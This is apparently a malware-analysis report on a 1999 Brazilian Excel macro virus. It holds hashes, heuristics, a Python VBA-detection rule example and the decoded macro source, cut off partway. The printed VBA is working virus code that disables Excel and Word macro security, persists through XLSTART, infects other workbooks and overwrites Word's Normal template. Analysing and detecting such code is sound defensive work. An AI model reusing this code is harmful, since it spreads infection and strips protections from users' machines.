Xls.Trojan.War-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 bf758fc57317999f…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1999-04-13 06:52:33
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: b33d358d7422bb94fd95eaf061150c68
SHA-1: 26eaacc5a58eb7dae06ede4f1a16c0ca38c5ff04
SHA-256: bf758fc57317999fc83e1651a20718742856b8d4d07a290217dcd192ee00b93b
Risk Score: 340

Malware Insights

Xls.Trojan.War-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as Xls.Trojan.War-1. The extracted VBA (module "Email") opens with a Portuguese comment that translates as "First Brazilian Excel virus for Excel 97 and Excel 2000, e-mail and mIRC" signed "AlevirusS>C>S 1999", which agrees with the 1999 Created timestamp. The module carries Auto_Open and Auto_Close procedures, so the code runs as soon as the workbook is opened and again when it is closed. Auto_Open first lowers Excel's macro security: through System.PrivateProfileString it writes Level = 1 under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security and greys out the Macro > Security... or Tools > Macro menu entry so the user cannot easily restore it. It then saves a hidden copy of the workbook as ALEVIRUSCS.XLM in Application.StartupPath (Excel's XLSTART folder, loaded on every Excel start) and sets Application.OnSheetActivate to ALEVIRUSCS.XLM!Puta, a routine that copies the hidden "Email" sheet into whatever workbook the user activates next, so every workbook touched during the session becomes a carrier. Auto_Close drops further copies under C:\WINDOWS (WAR3.XLS, SEXO.XLS, FONE.XLS, AVP.XLS, CAIXA.XLS). The Estupro routine uses GetObject and CreateObject on Word.Application to rewrite the AutoExec macro of Word's Normal template so that Word's macro virus protection is switched off and the Excel 97 (Office 8.0) Options6 values are blanked, extending the infection to Word. The MkDir calls create an XLINICIO directory under the Portuguese and the (misspelled) English Program Files paths; the listing is truncated before the Email, Mirc and Dia procedures, so what they do is not shown here. The auto-execute entry points, the deliberate weakening of macro security and the e-mail and mIRC references are consistent with delivery as a malicious attachment.

Heuristics (7)

  • ClamAV: Xls.Trojan.War-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.War-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
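As an added example (not the scanner that produced this report), the following Python applies source-level checks of the same kind to extracted VBA text: the Auto_Open/Auto_Close, CreateObject and GetObject rules listed above, plus rules for the specific behaviours visible in the macros.bas listing on this page (the PrivateProfileString write to the Excel Security Level value, SaveCopyAs into Application.StartupPath, the NormalTemplate.VBProject edit, the OnSheetActivate hook, the CommandBars menu disable and the SaveCopyAs drops to fixed paths). It also reproduces the combination that OLE_VBA_PCODE_AUTOEXEC_EXEC keys on, an auto-execution token together with an object-execution token, over source rather than p-code. Rule IDs prefixed X_ and the verdict thresholds are this example's own, not the report's risk score; the input is a constructed excerpt quoted from the listing.

```python
"""Source-level VBA triage rules in the style of the OLE_VBA_* heuristics above.
Added example for this page; not the scanner that produced the report."""
import re
from dataclasses import dataclass

# Constructed input: statements quoted from the macros.bas listing on this page,
# trimmed to the lines the rules below are meant to catch.
SAMPLE_VBA = r'''
Attribute VB_Name = "Email"
Sub Auto_Open()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = 0
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
End Sub
Function NoOlho()
  Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
  Windows("ALEVIRUSCS.XLM").Visible = False
End Function
Sub Auto_Close()
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
End Sub
Private Sub Estupro()
Set WordObj = GetObject(, "Word.Application")
Set WordObj = CreateObject("Word.Application")
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
NT.InsertLines 1, "Sub AutoExec()"
End Sub
'''

# (rule id, severity, description, per-line regex). The first four ids are the
# report's own heuristic ids; ids starting with X_ are hypothetical names used
# only in this example.
RULES = [
    ("OLE_VBA_AUTO", "high", "Auto_Open macro",
     r'^\s*(Public\s+|Private\s+)?Sub\s+Auto_Open\b'),
    ("OLE_VBA_AUTOCLOSE", "high", "Auto_Close macro",
     r'^\s*(Public\s+|Private\s+)?Sub\s+Auto_Close\b'),
    ("OLE_VBA_CREATEOBJ", "high", "CreateObject call", r'\bCreateObject\s*\('),
    ("OLE_VBA_GETOBJ", "high", "GetObject call", r'\bGetObject\s*\('),
    ("X_MACRO_SECURITY_DOWNGRADE", "critical",
     "writes Excel macro security Level=1 via PrivateProfileString",
     r'PrivateProfileString\(.*Office\\[\d.]+\\Excel\\Security.*"Level"\)\s*=\s*1'),
    ("X_XLSTART_PERSIST", "critical",
     "SaveCopyAs into Application.StartupPath (XLSTART, loaded on every Excel start)",
     r'SaveCopyAs\s+Application\.StartupPath'),
    ("X_NORMAL_TEMPLATE_INFECT", "critical",
     "edits the code module of Word's Normal template",
     r'NormalTemplate\.VBProject\.VBComponents'),
    ("X_EVENT_HOOK", "high", "assigns a macro to Application.OnSheetActivate",
     r'Application\.OnSheetActivate\s*='),
    ("X_MENU_DISABLE", "medium", "disables a CommandBars menu control",
     r'CommandBars\(.*\)\.Controls\(.*\)\.Enabled\s*=\s*(0|False)'),
    ("X_DROP_COPY", "medium", "SaveCopyAs to a fixed drive path",
     r'SaveCopyAs\s+"[A-Za-z]:\\'),
]
AUTOEXEC_IDS = {"OLE_VBA_AUTO", "OLE_VBA_AUTOCLOSE"}
OBJECT_EXEC_IDS = {"OLE_VBA_CREATEOBJ", "OLE_VBA_GETOBJ"}


@dataclass
class Finding:
    rule_id: str
    severity: str
    description: str
    line_no: int
    evidence: str


def scan_vba(source: str) -> list[Finding]:
    """Run every rule over each line of already-extracted VBA source (VBA is
    case-insensitive, so the regexes are compiled with IGNORECASE)."""
    compiled = [(rid, sev, desc, re.compile(rx, re.IGNORECASE))
                for rid, sev, desc, rx in RULES]
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for rid, sev, desc, rx in compiled:
            if rx.search(line):
                findings.append(Finding(rid, sev, desc, line_no, line.strip()))
    return findings


def autoexec_with_object_exec(findings: list[Finding]) -> bool:
    """Source-level version of the auto-exec + execution-token combination:
    an Auto_Open/Auto_Close entry point plus a CreateObject/GetObject call."""
    ids = {f.rule_id for f in findings}
    return bool(ids & AUTOEXEC_IDS) and bool(ids & OBJECT_EXEC_IDS)


def verdict(findings: list[Finding]) -> str:
    """Example thresholds only (assumption, not the report's scoring)."""
    sev = {f.severity for f in findings}
    if autoexec_with_object_exec(findings) and "critical" in sev:
        return "malicious"
    if autoexec_with_object_exec(findings) or sev & {"high", "critical"}:
        return "suspicious"
    return "no-findings"


def summarize(source: str) -> dict:
    findings = scan_vba(source)
    return {
        "rule_ids": sorted({f.rule_id for f in findings}),
        "autoexec_with_object_exec": autoexec_with_object_exec(findings),
        "verdict": verdict(findings),
        "findings": findings,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_VBA)
    for f in report["findings"]:
        print(f"{f.severity:8} {f.rule_id:28} line {f.line_no:3}: {f.evidence[:70]}")
    print("autoexec+object-exec:", report["autoexec_with_object_exec"])
    print("verdict:", report["verdict"])
```

Feed it the output of `olevba --decode` (or the macros.bas artifact below) rather than the raw OLE file: these rules only see decoded source, which is exactly why the report keeps a separate p-code rule for documents whose source stream is missing or mangled.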

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8852 bytes
SHA-256: 6b8731e16dc386455be3d5338071fbb6d1b1eca203793b0ad79956bbbb4122ea
Detection: ClamAV: Xls.Trojan.War-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Excel2000 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = 0
End If
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0

If Tudo() Then
    GoTo SejaGay:
Else
    NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
    If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
    For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
        If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
            Tudo = True
        End If
    Next y
    End If
Next x
End Function

Function NoOlho()
  activebook = ActiveWorkbook.Name
  Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
  Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
  Windows("ALEVIRUSCS.XLM").Visible = False
 Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function

Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
    If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
            Amerda = True
   End If
Next y
End Function

Sub Puta()
    oactivebook = ActiveWorkbook.Name
    If Amerda() Then
    GoTo cya
    Else
    End If
    Application.ScreenUpdating = False
    Application.Windows("ALEVIRUSCS.XLM").Visible = True
    Workbooks("ALEVIRUSCS.XLM").Activate
    Sheets("Email").Visible = True
    Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
    Workbooks(oactivebook).Sheets("Email").Visible = False
    Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
    Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub

Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub

Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 5, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 6, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 7, "End Sub"
WordObj.Run "Normal.ThisDocument.AutoExec"
End If
Set NT = Nothing
If Quit = True Then WordObj.Quit
End Sub

Private Sub
... (truncated)